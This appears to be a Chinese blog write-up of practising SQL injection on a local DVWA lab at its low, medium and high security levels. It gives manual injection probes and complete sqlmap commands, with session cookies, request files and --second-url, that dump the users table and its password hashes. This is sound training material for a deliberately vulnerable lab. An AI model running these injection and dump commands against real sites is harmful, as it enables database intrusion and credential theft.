资讯详情

【DVWA】SQL注入

SQL注入

      • ==这里注入灵魂:practice make**s** perfect~==
  • LOW就完了
    • *手动注入
    • *sqlmap注入
  • Mid就完了
    • *sqlmap注入
  • High就完了
    • *sqlmap注入

这里注入灵魂:practice make perfect~

LOW就完了

*手动注入

1.猛猛判断过程:

1’ and ‘1’='1 判断闭合显示 根据order by判断几列 正确判断有两列回显 在结果中找到可疑信息: 查到名字为dvwa库名和其中的名称users的可疑表。 最后通过md五转密文得出结果。

*sqlmap注入

思路依旧:库-表-列–用户密码

sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” --dbs -batch

  • cookie其功能是保持客户端和服务器的状态,以验证是否来自同一服务器。因此,需要登录的访问应携带指定的当前访问cookie身份验证。 –dbs 获取数据库信息 -batch 批处理?maybe

对可疑库名dvwa进行检测 sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” -D dvwa --tables --batch

对可疑表名users go on to detect sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” -D dvwa -T users --dump --batch –dump指令用于导出相应表中的数据

okk了 skr

Mid就完了

*sqlmap注入

针对post提交方法,sqlmap使用burpsuite获取request信息>txt格式

sqlmap -r request.txt --dbs sqlmap -r request.txt -D dvwa --tables sqlmap -r request.txt -D dvwa -T users --dump --batch

okk了

High就完了

*sqlmap注入

本打算在这里继续mid中使用burp对request头加上referer测试关键词,但不知道为什么失败。 high比上边多了一个重定向部分: Referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/ sqlmap -r high.txt --referer “http://127.0.0.1/DVWA/vulnerabilities/sqli/” -p referer --level 3 --dbs 我觉得这里应该很难。…

方法一: 因此,知难而退的学者本人决定使用它–second-url的方法来 参考仙女的实验步骤:DVWA练习——sql注入

sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/session-input.php” --data=“id=1&Submit=Submit” --second-url=“http://127.0.0.1/DVWA/vulnerabilities/sqli/” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj;security=high” --dbs -batch

-u的url是提交页面 –second-url是显示页面

*改错:知道为什么,因为burp一开始抓到的是click页面包,但要抓的是提交页面的包进行检测。 补充方法二: 正确的包应该是提交数据后 之后>high.txt

sqlmap -r high.txt --dbs

改错的灵感来自方法一中的两个url区别的理解~

标签: skr内置弹簧自复位位移传感器

锐单商城拥有海量元器件数据手册IC替代型号,打造 电子元器件IC百科大全!

锐单商城 - 一站式电子元器件采购平台